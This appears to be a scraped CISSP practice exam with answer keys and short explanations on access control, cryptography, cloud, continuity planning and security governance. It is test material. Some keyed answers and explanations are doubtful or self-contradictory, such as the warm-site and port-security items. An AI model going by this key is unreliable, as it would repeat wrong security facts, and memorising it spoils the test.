CISSP+ Practice Exam 1

An authentication system that uses challenge and response was recently implemented on an organization's network, because the organization conducted an annual penetration test showing that testers were able to move laterally using authenticated credentials. Which attack method was MOST likely used to achieve this? A. Hash collision B. Pass the ticket C. Brute force D. Cross-Site Scripting (XSS)

B. Pass the ticket "Pass the Ticket is a credential theft technique that enables adversaries to use stolen Kerberos tickets to authenticate to resources (e.g., file shares and other computers) as a user without having to compromise that user's password. Adversaries often use this technique to move laterally through an organization's network to hunt for opportunities to escalate their privileges or fulfill their mission." https://www.netwrix.com/pass_the_ticket.html

Which of the following BEST describes the purpose of the reference monitor when defining access control to enforce the security model? A. Strong operational security to keep unit members safe B. Policies to validate organization rules C. Cyber hygiene to ensure organizations can keep systems healthy D. Quality design principles to ensure quality by design

B. Policies to validate organization rules The reference monitor is a concept in computer security that represents an abstract machine or component responsible for enforcing access control policies. It is an essential component of the security model used to ensure that access to system resources is granted or denied based on predefined rules and policies. The reference monitor validates and enforces these organization-specific rules and policies regarding access control. It acts as a trusted authority that mediates all access requests and determines whether they should be permitted or denied based on the established security policies.

What is the MAIN purpose of a security assessment plan? A. Provide education to employees on security and privacy, to ensure their awareness on policies and procedures. B. Provide the objectives for the security and privacy control assessments and a detailed roadmap of how to conduct such assessments. C. Provide guidance on security requirements, to ensure the identified security risks are properly addressed based on the recommendation. D. Provide technical information to executives to help them understand information security postures and secure funding.

B. Provide the objectives for the security and privacy control assessments and a detailed roadmap of how to conduct such assessments.

What is the BEST approach to anonymizing personally identifiable information (PII) in a test environment? A. Swapping data B. Randomizing data C. Encoding data D. Encrypting data

B. Randomizing data Randomizing data is a common approach to anonymization. It involves replacing original data values with randomly generated values that do not correspond to any real individuals. This ensures that the data cannot be traced back to its original source while still maintaining its structural and statistical properties for testing.

A web developer is completing a new web application security checklist before releasing the application to production. The task of disabling unnecessary services is on the checklist. Which web application threat is being mitigated by this action? A. Session hijacking B. Security misconfiguration C. Broken access control D. Sensitive data exposure

B. Security misconfiguration Disabling unnecessary services helps reduce the attack surface of a web application by eliminating potential entry points for attackers. It helps ensure that only essential services are running, reducing the chances of security vulnerabilities arising from misconfigured or unpatched services. By disabling unnecessary services, the web developer minimizes the risk of security misconfigurations that could be exploited by attackers.

Which reporting type requires a service organization to describe its system and define its control objectives and controls that are relevant to users' internal control over financial reporting? A. Statement on Auditing Standards (SAS) 70 B. Service Organization Control 1 (SOC1) C. Service Organization Control 2 (SOC2) D. Service Organization Control 3 (SOC3)

B. Service Organization Control 1 (SOC1)

A security professional needs to find a secure and efficient method of encrypting data on an endpoint. Which solution includes a root key? A. Bitlocker B. Trusted Platform Module (TPM) C. Virtual storage array network (VSAN) D. Hardware security module (HSM)

B. Trusted Platform Module (TPM) TPM: Integrated into endpoint devices. Secure storage of root keys. Used for disk encryption (e.g., BitLocker). Cost-effective for individual devices. HSM: External hardware used in server environments. Provides high-security key management for enterprise applications. More expensive and complex to implement on individual endpoints.

The security architect is designing and implementing an internal certification authority to generate digital certificates for all employees. Which of the following is theBEST solution to securely store the private keys? A. Physically secured storage device B. Trusted Platform Module (TPM) C. Encrypted flash drive D. Public key infrastructure (PKI)

B. Trusted Platform Module (TPM) Trusted Platform Module (TPM): A TPM is a hardware-based security module that is typically embedded on the motherboard of a computer system. It provides secure storage for cryptographic keys and other sensitive data. TPMs are designed to be tamper-resistant and can be used to protect against various attacks, including cold boot attacks and physical tampering.

A subscription service which provides power, climate control, raised flooring, and telephone wiring but NOT the computer and peripheral equipment is BEST described as a: A. cold site. B. warm site. C. hot site. D. reciprocal site.

B. Warm Site A warm site is a facility that provides essential infrastructure and services, such as power and environmental controls, but does not have the actual computer systems and equipment in place. It allows for a quicker recovery compared to a cold site as it has some infrastructure ready, but organizations need to provide and install their own computing equipment.

When developing an organization's information security budget, it is important that the: A. requested funds are at an equal amount to the expected cost of breaches. B. expected risk can be managed appropriately with the funds allocated. C. requested funds are part of a shared funding pool with other areas. D. expected risk to the organization does not exceed the funds allocated.

B. expected risk can be managed appropriately with the funds allocated. When developing an organization's information security budget, it is crucial to ensure that the allocated funds align with the expected risk to the organization. This means that the budget should be sufficient to address the identified risks and implement appropriate security measures. By evaluating the potential risks and their potential impact, organizations can determine the necessary funding to effectively manage and mitigate those risks.

A corporation does not have a formal data destruction policy. During which phase of a criminal legal proceeding will this have the MOST impact? A. Sentencing B. Trial C. Discovery D. Arraignment

C. Discovery The lack of a formal data destruction policy would have the MOST impact during the discovery phase of a criminal legal proceeding. During the discovery phase, both the prosecution and defense exchange relevant information and evidence related to the case. This includes providing documents, records, and other forms of evidence that are pertinent to the case. In the context of a criminal legal proceeding, if a corporation does not have a formal data destruction policy, it may lead to the unintentional or intentional destruction of potentially relevant evidence. This could include deleting or disposing of electronic records, documents, or other forms of data that could be crucial to the case.

Within a large organization, what business unit is BEST positioned to initiate provisioning and deprovisioning of user accounts? A. Training department B. Internal audit C. Human resources D. Information technology (IT)

C. HR

An organization is trying to secure instant messaging (IM) communications through its network perimeter. Which of the following is the MOST significant challenge? A. IM clients can interoperate between multiple vendors. B. IM clients can run as executables that do not require installation. C. IM clients can utilize random port numbers. D. IM clients can run without administrator privileges.

C. IM clients can utilize random port numbers.

In a quarterly system access review, an active privileged account was discovered that did not exist in the prior review on the production system. The account was created one hour after the previous access review. Which of the following is the BEST option to reduce overall risk in addition to quarterly access reviews? A. Implement bi-annual reviews. B. Create policies for system access. C. Implement and review risk-based alerts. D. Increase logging levels.

C. Implement and review risk-based alerts. Implementing and reviewing risk-based alerts would enable early detection of suspicious or unauthorized activity, such as the creation of new privileged accounts, and react accordingly. This proactive approach helps to identify and mitigate potential risks in real time, rather than relying solely on periodic reviews.

A company is planning to implement a private cloud infrastructure. Which of the following recommendations will support the move to a cloud infrastructure? A. Implement software-defined networking (SDN) to provide the ability to apply high-level policies to shape and reorder network traffic based on users, devices and applications. B. Implement a virtual local area network (VLAN) for each department and create a separate subnet for each VLAN. C. Implement software-defined networking (SDN) to provide the ability for the network infrastructure to be integrated with the control and data planes. D. Implement a virtual local area network (VLAN) to logically separate the local area network (LAN) from the physical switches. Reveal Solution Discussion 13

C. Implement software-defined networking (SDN) to provide the ability for the network infrastructure to be integrated with the control and data planes.

When assessing web vulnerabilities, how can navigating the dark web add value to a penetration test? A. Information may be found on hidden vendor patches. B. The actual origin and tools used for the test can be hidden. C. Information may be found on related breaches and hacking. D. Vulnerabilities can be tested without impact on the tested environment.

C. Information may be found on related breaches and hacking.

A cloud service provider requires its customer organizations to enable maximum audit logging for its data storage service and to retain the logs for the period of three months. The audit logging gene has extremely high amount of logs. What is the MOST appropriate strategy for the log retention? A. Keep all logs in an online storage. B. Keep last week's logs in an online storage and the rest in an offline storage. C. Keep last week's logs in an online storage and the rest in a near-line storage. D. Keep all logs in an offline storage.

C. Keep last week's logs in an online storage and the rest in a near-line storage. nearline allows you to retrieve the data with very little or no additional costs when it is in a short period like 3 months.

What documentation is produced FIRST when performing an effective physical loss control process? A. Deterrent controls list B. Security standards list C. Asset valuation list D. Inventory list

D. Inventory list The first step in an effective physical loss control process is to conduct an inventory of the organization's assets. This includes identifying, cataloging, and valuing all physical assets that are important to the organization. The inventory list should include a description of each asset, its location, and its value. This information is used to identify the most critical assets that need to be protected and to prioritize security measures. The inventory list serves as the foundation for the rest of the physical loss control process, providing a clear understanding of the assets that need to be protected and the potential risks that they may face.

Which section of the assessment report addresses separate vulnerabilities, weaknesses, and gaps? A. Findings definition section B. Risk review section C. Executive summary with full details D. Key findings section

D. Key findings section

An application developer receives a report back from the security team showing their automated tools were able to successfully enter unexpected data into the organization's customer service portal, causing the site to crash. This is an example of which type of testing? A. Performance B. Positive C. Non-functional D. Negative

D. Negative Negative testing ensures that your application can gracefully handle invalid input or unexpected user behavior. In this case, it fails the negative testing. For example, if a user tries to type a letter in a numeric field, the correct behavior in this case would be to display the "Incorrect data type, please enter a number" message. The purpose of negative testing is to detect such situations and prevent applications from crashing. This has nothing to do with Non-functioning testing because Non-functional testing is a type of software testing that verifies non functional aspects of the product, such as performance, stability, and usability....

What type of risk is related to the sequences of value-adding and managerial activities undertaken in an organization? A. Control risk B. Demand risk C. Supply risk D. Process risk

D. Process risk

In a DevOps environment, which of the following actions is MOST necessary to have confidence in the quality of the changes being made? A. Prepare to take corrective actions quickly. B. Automate functionality testing. C. Review logs for any anomalies. D. Receive approval from the change review board.

D. Receive approval from the change review board.

What is the MOST significant benefit of role-based access control (RBAC)? A. Reduces inappropriate access B. Management of least privilege C. Most granular form of access control D. Reduction in authorization administration overhead

D. Reduction in authorization administration overhead

What process facilitates the balance of operational and economic costs of protective measures with gains in mission capability? A. Performance testing B. Risk assessment C. Security audit D. Risk management

D. Risk Management Risk management involves balancing operational and economic costs of protective measures with the gains in mission capability. It assesses potential risks and implements strategies to mitigate them while considering both cost and effectiveness.

What industry-recognized document could be used as a baseline reference that is related to data security and business operations or conducting a security assessment? A. Service Organization Control (SOC) 1 Type 2 B. Service Organization Control (SOC) 1 Type 1 C. Service Organization Control (SOC) 2 Type 2 D. Service Organization Control (SOC) 2 Type 1

D. Service Organization Control (SOC) 2 Type 1 Reveal Solution

An organization would like to implement an authorization mechanism that would simplify the assignment of various system access permissions for many users with similar job responsibilities. Which type of authorization mechanism would be the BEST choice for the organization to implement? A. Role-based access control (RBAC) B. Discretionary access control (DAC) C. Content-dependent Access Control D. Rule-based Access Control

A. Users with similar responsibilities should always be assigned a role. This simplifies the process of granting access when users join the team as well as move to new teams.

What is the MOST effective method to enhance security of a single sign-on (SSO) solution that interfaces with critical systems? A. Two-factor authentication B. Reusable tokens for application level authentication C. High performance encryption algorithms D. Secure Sockets Layer (SSL) for all communications

A. Two-factor authentication Two-factor authentication (2FA) adds an additional layer of security to the authentication process by requiring users to provide two forms of identification: something they know (e.g., a password) and something they have (e.g., a physical token or a mobile device). This approach significantly reduces the risk of unauthorized access even if the user's password is compromised.

What is the BEST way to restrict access to a file system on computing systems? A. Use least privilege at each level to restrict access. B. Restrict access to all users. C. Allow a user group to restrict access. D. Use a third-party tool to restrict access.

A. Use least privilege at each level to restrict access.

Which of the following is the MOST appropriate control for asset data labeling procedures? A. Categorizing the types of media being used B. Logging data media to provide a physical inventory control C. Reviewing off-site storage access controls D. Reviewing audit trails of logging records

A Categorizing the types of media being used. Asset data labeling procedures involve labeling and categorizing different types of media (such as physical storage devices, electronic media, or documents) to effectively manage and track data assets. Categorizing the types of media being used helps in identifying and distinguishing between different storage devices and media types, allowing for better organization and control. By categorizing the types of media, organizations can implement appropriate security controls and procedures tailored to each category. This includes assigning different levels of sensitivity or classification to data stored on specific media, implementing access controls based on media types, and applying specific handling and disposal procedures.

The acquisition of personal data being obtained by a lawful and fair means is an example of what principle? A. Collection Limitation Principle B. Openness Principle C. Purpose Specification Principle D. Data Quality Principle

A Collection limitation principle - limit the collection of personal data to only what is needed to provide a service, obtain the personal data lawfully and, where appropriate, with the knowledge or consent of the data subject.

Which one of the following BEST protects vendor accounts that are used for emergency maintenance? A. Vendor access should be disabled until needed B. Frequent monitoring of vendor access C. Role-based access control (RBAC) D. Encryption of routing tables

A Accounts should be disabled until needed Emergency Accounts are intended for short-term use and include restrictions on creation, point of origin, and usage (i.e., time of day, day of week). SEs may establish emergency accounts in response to crisis situations and with the need for rapid account activation. Therefore, emergency account activation may bypass normal account authorization processes. Emergency accounts must be automatically disabled after 24 hours. https://www.cisecurity.org/wp-content/uploads/2020/06/Account-Management-Access-Control-Standard.docx

Which organizational department is ultimately responsible for information governance related to e-mail and other e-records? A. Legal B. Audit C. Compliance D. Security

A) Legal While data governance focuses mostly on the technical aspects of data handling, information governance takes a broader approach by incorporating legal, regulatory, and strategic considerations. https://www.epiqglobal.com/en-us/resource-center/articles/data-governance-vs-information-governance#:~:text=While%20data%20governance%20focuses%20mostly,information%20as%20a%20valuable%20asset

Which of the following would an information security professional use to recognize changes to content, particularly unauthorized changes? A. File Integrity Checker B. Security information and event management (SIEM) system C. Audit Logs D. Intrusion detection system (IDS)

A. File integrity monitoring (FIM) refers to an IT security process and technology that tests and checks operating system (OS), database, and application software files to determine whether or not they have been tampered with or corrupted. FIM, which is a type of change auditing, verifies and validates these files by comparing the latest versions of them to a known, trusted "baseline." If FIM detects that files have been altered, updated, or compromised, FIM can generate alerts to ensure further investigation, and if necessary, remediation, takes place.

What is the PRIMARY reason for criminal law being difficult to enforce when dealing with cybercrime? A. Jurisdiction is hard to define. B. Law enforcement agencies are understaffed. C. Extradition treaties are rarely enforced. D. Numerous language barriers exist.

A. Cybercrime can take place across borders, making it difficult to determine which jurisdiction has the authority to investigate and prosecute the crime. This can be especially challenging when the attacker is located in a different country than the victim. The other answer choices are also factors that can make it difficult to enforce criminal law when dealing with cybercrime, but they are not as important as the issue of jurisdiction.

The quality assurance (QA) department is short-staffed and is unable to test all modules before the anticipated release date of an application. What security control is MOST likely to be violated? A. Change management B. Separation of environments C. Program management D. Mobile code controls

A. Change management Violated the "Release Control" of Change Management. Release Control Once the changes are finalized, they must be approved for release through the release control procedure. An essential step of the release control process is to double-check and ensure that any code inserted as a programming aid during the change process (such as debugging code and/or backdoors) is removed before releasing the new software to production. This process also ensures that only approved changes are made to production systems. Release control should also include acceptance testing to ensure that any alterations to end-user work tasks are understood and functional.

What term is commonly used to describe hardware and software assets that are stored in a configuration management database (CMDB)? A. Configuration item B. Configuration element C. Ledger item D. Asset register

A. Configuration item A configuration item refers to any component or element of an IT system that needs to be managed and controlled. It can include physical devices, software applications, databases, network components, and other related items. The CMDB is a central repository that stores information about these configuration items, including their attributes, relationships, and configurations.

Which of the following is the MOST effective strategy to prevent an attacker from disabling a network? A. Design networks with the ability to adapt, reconfigure, and fail over. B. Test business continuity and disaster recovery (DR) plans. C. Follow security guidelines to prevent unauthorized network access. D. Implement network segmentation to achieve robustness. Reveal Solution Discussion 41

A. Design networks with the ability to adapt, reconfigure, and fail over. This approach ensures that the network can maintain its functionality even when under attack. This strategy offers resilience against a wide range of attacks. Examples include: 1. Software-Defined Networking (SDN): SDN controllers enable dynamic network reconfiguration and policy enforcement. 2. Network Function Virtualization (NFV): Virtualizes network services to allow for rapid deployment and scaling. 3. Load Balancers: Distribute traffic across multiple servers to prevent overload and ensure availability.

Which combination of cryptographic algorithms are compliant with Federal Information Processing Standard (FIPS) Publication 140-2 for non-legacy systems? A. Diffie-hellman (DH) key exchange: DH (>=2048 bits) Symmetric Key: Advanced Encryption Standard (AES) > 128 bits Digital Signature: Digital Signature Algorithm (DSA) (>=2048 bits) B. Diffie-hellman (DH) key exchange: DH (>=2048 bits) Symmetric Key: Advanced Encryption Standard (AES) > 128 bits Digital Signature: Rivest-Shamir-Adleman (RSA) (1024 bits) C. Diffie-hellman (DH) key exchange: DH (<=1024 bits) Symmetric Key: Blowfish Digital Signature: Rivest-Shamir-Adleman (RSA) (>=2048 bits) D. Diffie-hellman (DH) key exchange: DH (>=2048 bits) Symmetric Key: Advanced Encryption Standard (AES) < 128 bits Digital Signature: Elliptic Curve Digital Signature Algorithm (ECDSA) (>=256 bits)

A. Diffie-hellman (DH) key exchange: DH (>=2048 bits) Symmetric Key: Advanced Encryption Standard (AES) > 128 bits Digital Signature: Digital Signature Algorithm (DSA) (>=2048 bits)

Which of the following is the BEST option to reduce the network attack surface of a system? A. Disabling unnecessary ports and services B. Ensuring that there are no group accounts on the system C. Uninstalling default software on the system D. Removing unnecessary system user accounts

A. Disabling unnecessary ports and services The attack surface is the number of all possible points, or attack vectors, where an unauthorized user can access a system and extract data. The smaller the attack surface, the easier it is to protect. https://www.fortinet.com/resources/cyberglossary/attack-surface

Which of the following is the BEST way to protect an organization's data assets? A. Encrypt data in transit and at rest using up-to-date cryptographic algorithms. B. Monitor and enforce adherence to security policies. C. Require Multi-Factor Authentication (MFA) and Separation of Duties (SoD). D. Create the Demilitarized Zone (DMZ) with proxies, firewalls and hardened bastion hosts. Reveal Solution Discussion 50

A. Encrypt data in transit and at rest using up-to-date cryptographic algorithms.

Wi-Fi Protected Access 2 (WPA2) provides users with a higher level of assurance that their data will remain protected by using which protocol? A. Extensible Authentication Protocol (EAP) B. Internet Protocol Security (IPsec) C. Secure Sockets Layer (SSL) D. Secure Shell (SSH)

A. Extensible Authentication Protocol (EAP) is the protocol used by Wi-Fi Protected Access 2 (WPA2) to provide users with a higher level of assurance that their data will remain protected. EAP provides a framework for transporting authentication protocols that are used in wireless networks, and it is used to authenticate users and devices before they are granted access to the network.

Which of the following would qualify as an exception to the "right to be forgotten" of the General Data Protection Regulation (GDPR)? A. For the establishment, exercise, or defense of legal claims B. The personal data has been lawfully processed and collected C. For the reasons of private interest D. The personal data remains necessary to the purpose for which it was collected

A. For the establishment, exercise, or defense of legal claims The right to be forgotten allows individuals to request the erasure of their personal data under certain circumstances. However, this right is not absolute, and there are exceptions where data can be retained even if a request for erasure is made. One such exception is when the personal data is necessary for the establishment, exercise, or defense of legal claims. In such cases, the organization may be required to retain the data to fulfill its legal obligations or protect its legal rights. https://gdpr-info.eu/issues/right-to-be-forgotten/

Which of the following is MOST appropriate to collect evidence of a zero-day attack? A. Honeypot B. Antispam C. Antivirus D. Firewall

A. Honeypot

A company is attempting to enhance the security of its user authentication processes. After evaluating several options, the company has decided to utilize Identity as a Service (IDaaS). Which of the following factors leads the company to choose an IDaaS as their solution? A. In-house team lacks resources to support an on-premise solution. B. Third-party solutions are inherently more secure. C. Third-party solutions are known for transferring the risk to the vendor. D. In-house development provides more control.

A. In-house team lacks resources to support an on-premise solution

Using the cipher text and resultant cleartext message to derive the monoalphabetic cipher key is an example of which method of cryptanalytic attack? A. Known-plaintext attack B. Ciphertext-only attack C. Frequency analysis D. Probable-plaintext attack

A. Known-plaintext attack P299 of the Sybex book

Which of the following criteria ensures information is protected relative to its importance to the organization? A. Legal requirements, value, criticality, and sensitivity to unauthorized disclosure or modification B. The value of the data to the organization's senior management C. Organizational stakeholders, with classification approved by the management board D. Legal requirements determined by the organization headquarters' location

A. Legal requirements, value, criticality, and sensitivity to unauthorized disclosure or modification

Which of the following ensures old log data is not overwritten? A. Log retention B. Implement Syslog C. Increase log file size D. Log preservation

A. Log retention Data retention is the storing of data for recordkeeping and regulatory compliance, while data preservation is preserving ESI for an anticipated legal matter

What is the PRIMARY purpose of creating and reporting metrics for a security awareness, training, and education program? A. Measure the effect of the program on the organization's workforce. B. Make all stakeholders aware of the program's progress. C. Facilitate supervision of periodic training events. D. Comply with legal regulations and document due diligence in security practices.

A. Measure the effect of the program on the organization's workforce. Demonstrate ROI: Justify the program's existence and secure continued funding. Identify areas for improvement: Pinpoint weaknesses in training content or delivery. Enhance security culture: Foster a culture of security awareness among employees. While the other options are important, they are secondary to the overall goal of measuring the program's impact on the workforce.

Which of the following is the MOST effective way to ensure the endpoint devices used by remote users are compliant with an organization's approved policies before being allowed on the network? A. Network Access Control (NAC) B. Privileged Access Management (PAM) C. Group Policy Object (GPO) D. Mobile Device Management (MDM)

A. Network Access Control (NAC) Network Access Control (NAC): NAC solutions provide a comprehensive approach to managing and enforcing security policies for devices attempting to access network resources. They can perform health checks on devices to ensure compliance with security policies (e.g., antivirus presence, up-to-date patches) before granting network access. This makes NAC highly effective for verifying compliance of endpoint devices used by remote users. NAC provides a holistic approach by integrating various checks and balances to ensure all endpoint devices meet the required security policies before accessing the network, making it the most effective solution for this purpose.

Which of the following departments initiates the request, approval, and provisioning business process? A. Operations B. Security C. Human resources (HR) D. Information technology (IT)

A. Operations Operation as a process owner should give requirement to IT. HR is responsible for access control provision not business process provision.

A criminal organization is planning an attack on a government network. Which of the following scenarios presents the HIGHEST risk to the organization? A. Organization loses control of their network devices. B. Network is flooded with communication traffic by the attacker. C. Network management communications is disrupted. D. Attacker accesses sensitive information regarding the network topology.

A. Organization loses control of their network devices.

An organization has implemented a protection strategy to secure the network from unauthorized external access. The new Chief Information Security Officer(CISO) wants to increase security by better protecting the network from unauthorized internal access. Which Network Access Control (NAC) capability BEST meets this objective? A. Port security B. Two-factor authentication (2FA) C. Strong passwords D. Application firewall

A. Port Security NAC = Port Security The key word - increase . The question told us that control already been implemented. Now they want to increase. B is increase which from 1 to 2 Port security is a Network Access Control (NAC) feature that controls access to a network by limiting the number of devices that can be connected to a switch port. It helps prevent unauthorized devices from gaining access to the internal network by ensuring that only authorized devices are allowed to connect to specific network ports.

Which of the following does the security design process ensure within the System Development Life Cycle (SDLC)? A. Proper security controls, security objectives, and security goals are properly initiated. B. Security objectives, security goals, and system test are properly conducted. C. Proper security controls, security goals, and fault mitigation are properly conducted. D. Security goals, proper security controls, and validation are properly initiated.

A. Proper security controls, security objectives, and security goals are properly initiated. The security design process within the System Development Life Cycle (SDLC) ensures that proper security controls, security objectives, and security goals are properly initiated. This includes identifying and assessing risks, and implementing controls to mitigate those risks. The security design process is a critical step in ensuring the security and integrity of a system throughout its lifecycle.

A company needs to provide shared access of sensitive data on a cloud storage to external business partners. Which of the following identity models is the BEST to blind identity providers (IdP) and relying parties (RP) so that subscriber lists of other parties are not disclosed? A. Proxied federation B. Dynamic registration C. Federation authorities D. Static registration

A. Proxied federation

An organization has requested storage area network (SAN) disks for a new project. What Redundant Array of Independent Disks (RAID) level provides the BEST redundancy and fault tolerance? A. RAID level 1 B. RAID level 3 C. RAID level 4 D. RAID level 5

A. RAID level 1 RAID 1 offers superior redundancy because it maintains an exact copy of all data on a second drive. In contrast, RAID 5 uses parity to protect data, which is efficient but slightly less strong in terms of redundancy.

What level of Redundant Array of Independent Disks (RAID) is configured PRIMARILY for high-performance data reads and writes? A. RAID-0 B. RAID-1 C. RAID-5 D. RAID-6

A. RAID-0

An international organization has decided to use a Software as a Service (SaaS) solution to support its business operations. Which of the following compliance standards should the organization use to assess the international code security and data privacy of the solution? A. Service Organization Control (SOC) 2 B. Information Assurance Technical Framework (IATF) C. Health Insurance Portability and Accountability Act (HIPAA) D. Payment Card Industry (PCI)

A. Service Organization Control (SOC) 2 Focus on Security, Availability, and Privacy: SOC 2 reports are specifically designed to evaluate service providers, like SaaS vendors, on controls related to the security, availability, processing integrity, confidentiality, and privacy of the systems they use to process customers' data. International Applicability: While developed by the American Institute of Certified Public Accountants (AICPA), SOC 2 is widely recognized internationally and often requested by organizations worldwide. Flexibility: SOC 2 allows specifying the Trust Services Criteria (security, privacy, etc.) that are most relevant to the organization's needs. B. Information Assurance Technical Framework (IATF): IATF is primarily used within US government agencies. It might have relevance in limited contexts, but it's less common for commercial business purposes.

What is the BEST method to use for assessing the security impact of acquired software? A. Threat modeling B. Common vulnerability review C. Software security compliance validation D. Vendor assessment

A. Threat modeling

Which technique helps system designers consider potential security concerns of their systems and applications? A. Threat modeling B. Manual inspections and reviews C. Source code review D. Penetration testing

A. Threat modeling A threat model is a structured representation of all the information that affects the security of an application. In essence, it is a view of the application and its environment through the lens of security https://owasp.org/www-community/Threat_Modeling#:~:text=A%20threat%20model%20is%20a,through%20the%20lens%20of%20security.

As a design principle, which one of the following actors is responsible for identifying and approving data security requirement in a cloud ecosystem? A. Cloud auditor B. Cloud broker C. Cloud provider D. Cloud consumer

Answer D) Cloud Consumer is responsible for DATA SECURITY on IaaS - PaaS - SaaS https://www.isc2.org/insights/2021/02/responsibility-and-accountability-in-the-cloud

Which of the following statements BEST describes least privilege principle in a cloud environment? A. A single cloud administrator is configured to access core functions. B. Internet traffic is inspected for all incoming and outgoing packets. C. Routing configurations are regularly updated with the latest routes. D. Network segments remain private if unneeded to access the internet.

Answer D: Least privilege extends beyond human access. The model can be applied to applications, systems or connected devices that require privileges or permissions to perform a required task. So internet access is being limited until it is needed to perform a specific task.

An attack utilizing social engineering and a malicious Uniform Resource Locator (URL) link to take advantage of a victim's existing browser session with a web application is an example of which of the following types of attack? A. Clickjacking B. Cross-site request forgery (CSRF) C. Cross-Site Scripting (XSS) D. Injection

Answer is B Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application A CSRF attack hinges on the use of social engineering. An attacker fools their victim by sending a link through a chat or email. When a victim is a user without admin privileges, the CSRF attack can make them do things like change an email address as it appears in the target site's system, transfer funds from an account, change username information, and more. If the victim has administrator privileges, the CSRF attack can be used to alter the function of the web application itself https://www.fortinet.com/resources/cyberglossary/csrf

Which of the following encryption technologies has the ability to function as a stream cipher? A. Cipher Block Chaining (CBC) with error propagation B. Electronic Code Book (ECB) C. Cipher Feedback (CFB) D. Feistel cipher

Answer is C Cipher feedback mode allows a block cipher with block size n bits to be used as a stream cipher with a data encryption unit of m bits, for any m ≤ n. In CFB mode, the block cipher operates on a register of n bits. The register is initially filled with an initialization vector.

Which of the following is MOST important to follow when developing information security controls for an organization? A. Use industry standard best practices for security controls in the organization. B. Exercise due diligence with regard to all risk management information to tailor appropriate controls. C. Review all local and international standards and choose the most stringent based on location. D. Perform a risk assessment and choose a standard that addresses existing gaps.

Answer is D "To assess risk, you need to think about threats and vulnerabilities. Start by making a list of any potential threats to your organization's assets, then score these threats based on their likelihood and impact. From there, think about what vulnerabilities exist within your organization, categorize and rank them based on potential impact. These vulnerabilities can consist of people (employees, clients, third parties), processes or lack thereof, and technologies in place. " https://www.barradvisory.com/roadmap-to-implementing-a-successful-information-security-program/

Which application type is considered high risk and provides a common way for malware and viruses to enter a network? A. Instant messaging or chat applications B. Peer-to-Peer (P2P) file sharing applications C. E-mail applications D. End-to-end applications

B

Which of the following is performed to determine a measure of success of a security awareness training program designed to prevent social engineering attacks? A. Employee evaluation of the training program B. Internal assessment of the training program's effectiveness C. Multiple choice tests to participants D. Management control of reviews

B. Internal assessment of the training program's effectiveness To determine the measure of success of a security awareness training program designed to prevent social engineering attacks, conducting an internal assessment of the program's effectiveness is essential. This assessment involves evaluating the program's impact on employees' knowledge, behavior, and ability to recognize and respond to social engineering attacks. It helps determine whether the training program is achieving its intended objectives and identifies areas for improvement.

Which of the following attacks, if successful, could give an intruder complete control of a software-defined networking (SDN) architecture? A. A brute force password attack on the Secure Shell (SSH) port of the controller B. Sending control messages to open a flow that does not pass a firewall from a compromised host within the network C. Remote Authentication Dial-In User Service (RADIUS) token replay attack D. Sniffing the traffic of a compromised host inside the network

B The attack that could give an intruder complete control of a software-defined networking (SDN) architecture is option B: Sending control messages to open a flow that does not pass a firewall from a compromised host within the network. In software-defined networking, the SDN controller is responsible for managing and controlling the network infrastructure. By sending control messages to open a flow that bypasses the firewall from a compromised host within the network, an attacker can gain unauthorized access and manipulate the network's behavior. This type of attack, known as a flow rule modification attack, can allow an attacker to inject malicious traffic into the network or bypass security controls, giving the attacker complete control over the network.

Which of the following is included in change management? A. Technical review by business owner B. User Acceptance Testing (UAT) before implementation C. Cost-benefit analysis (CBA) after implementation D. Business continuity testing

B User Acceptance Testing (UAT) is a crucial component of change management. It ensures that the change (new system, feature, or process) meets the end-users' requirements and expectations before it is fully implemented

Which event magnitude is defined as deadly, destructive, and disruptive when a hazard interacts with human vulnerability? A. Crisis B. Catastrophe C. Accident D. Disaster

B Catastrophe According to the CISSP official book, a catastrophe is defined as a major disruption that destroys the facility altogether. This aligns with the question's description of an event magnitude that is deadly, destructive, and disruptive when a hazard interacts with human vulnerability. In contrast, a disaster is described as an event that causes the entire facility to be unusable for a day or longer, but does not necessarily destroy the facility.

An enterprise is developing a baseline cybersecurity standard its suppliers must meet before being awarded a contract. Which of the following statements is TRUE about the baseline cybersecurity standard? A. It should be expressed as general requirements. B. It should be expressed as technical requirements. C. It should be expressed in business terminology. D. It should be expressed in legal terminology.

B. A baseline cybersecurity standard should be expressed in technical requirements to ensure clear and measurable expectations for suppliers. This includes specific controls, technologies, and processes that must be implemented. While general requirements can provide a high-level overview, technical requirements are essential for effective evaluation and enforcement of the standard. Here's a breakdown of why the other options are less effective: A. General requirements: Too vague and difficult to enforce. C. Business terminology: While understanding business needs is important, the standard should focus on technical implementation details. D. Legal terminology: While legal considerations are important, the primary focus should be on technical requirements to ensure effective security.

What is the correct order of execution for security architecture? A. Governance, strategy and program management, operations, project delivery B. Governance, strategy and program management, project delivery, operations C. Strategy and program management, project delivery, governance, operations D. Strategy and program management, governance, project delivery, operations

B. Governance, strategy and program management, project delivery, operations

Which access control method is based on users issuing access requests on system resources, features assigned to those resources, the operational or situational context, and a set of policies specified in terms of those features and context? A. Mandatory Access Control (MAC) B. Attribute Based Access Control (ABAC) C. Role Based Access Control (RBAC) D. Discretionary Access Control (DAC)

B. In ABAC, access decisions are made based on various attributes or characteristics associated with users, resources, and the environment. These attributes can include user roles, job titles, time of day, location, device type, and any other relevant contextual information. Policies are defined using these attributes, and access requests are evaluated against these policies to determine whether access should be granted or denied. ABAC offers a more flexible and fine-grained access control approach compared to other methods such as Role Based Access Control (RBAC) or Discretionary Access Control (DAC). It allows organizations to define access control policies based on dynamic and contextual factors, providing granular control over resource access and helping to enforce security requirements based on specific conditions. https://techgenix.com/5-access-control-types-comparison/

To monitor the security of buried data lines inside the perimeter of a facility, which of the following is the MOST effective control? A. Fencing around the facility with closed-circuit television (CCTV) cameras at all entry points B. Ground sensors installed and reporting to a security event management (SEM) system C. Regular sweeps of the perimeter, including manual inspection of the cable ingress points D. Steel casing around the facility ingress points

B. Ground sensors installed and reporting to a security event management (SEM) system. Ground sensors are devices that can detect vibrations or other disturbances in the ground. When a ground sensor is triggered, it sends an alert to a security event management (SEM) system. The SEM system can then notify security personnel of the alert, so they can investigate the situation.

